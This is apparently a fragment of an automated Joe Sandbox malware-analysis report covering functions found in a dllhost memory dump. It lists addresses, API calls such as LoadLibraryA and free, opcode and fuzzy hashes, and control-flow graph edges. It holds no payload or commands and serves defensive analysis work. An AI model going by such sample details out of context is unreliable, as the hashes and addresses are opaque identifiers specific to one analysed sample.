                                                                                                                                                                                                                                                                                                          • Instruction ID: 7baeaa723c69e00bb7fe45dacb3e7da7af98029a3cc9e49b6156807b0603e4c5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAE0C221705C0A0BAB6861AE249C6B665D6C7DC37271402BBE81DC3295ED21CC820390
                                                                                                                                                                                                                                                                                                          Function 000001F269C72874 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 225 1f269c72874-1f269c72891 call 1f269c71994 228 1f269c72898-1f269c7289e 225->228 229 1f269c72893-1f269c72896 LoadLibraryA 225->229 229->228
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                          • Instruction ID: 51b8cf619007773d654413da053e315b3459c2c606270ebba9eb795ce85372b9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D0A731321D0F1BEA48633D1CA43F525D5E7DC335F50113AF80AC2281DD6ACC560300
                                                                                                                                                                                                                                                                                                          Function 000001F269C78110 Relevance: 1.3, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b5384dccac2c23875dc477d8793d879d432b44bf7b98c6b9a0288323ef410ba4
                                                                                                                                                                                                                                                                                                          • Instruction ID: b21ef3c76000a86cc2f65bb418fab76462f4a07e4ece31ef3e62524135c5986a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5384dccac2c23875dc477d8793d879d432b44bf7b98c6b9a0288323ef410ba4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0031563031690A8BEF99EB68C8E5BF933A1FB98312F5440789D1BCA296DE359841C750
                                                                                                                                                                                                                                                                                                          Function 000001F269C73DC4 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 267 1f269c73dc4-1f269c73dd5 268 1f269c73dd7-1f269c73ddc 267->268 269 1f269c73df3-1f269c73df7 267->269 268->269 270 1f269c73dde-1f269c73de8 268->270 270->269 271 1f269c73dea-1f269c73ded free 270->271 271->269
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bb9af5f188e999aaccca2217ef087a27173e4940b7bf12038dcab6bea12f3e1c
                                                                                                                                                                                                                                                                                                          • Instruction ID: e3ae2855c36555662fffe0910386cd1e1c30d7303a33d15a5b6f665c1790ba66
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb9af5f188e999aaccca2217ef087a27173e4940b7bf12038dcab6bea12f3e1c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE0B63022690B8FFB59BB28A8997A032E1F729314F9504649417C61D0DBBAC585C744